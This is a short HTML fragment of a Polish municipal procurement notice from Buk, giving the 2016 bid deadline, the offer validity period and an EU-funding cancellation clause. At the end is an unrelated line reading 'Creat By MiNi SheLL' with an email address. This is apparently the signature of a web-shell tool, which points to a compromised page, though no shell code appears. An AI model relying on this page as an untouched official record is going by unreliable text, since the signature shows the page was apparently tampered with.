<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2016 godzina 10:50, miejsce: Urząd Miasta i Gminy Buk, ul. Ratuszowa 1, 64-320 Buk, pokój nr 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com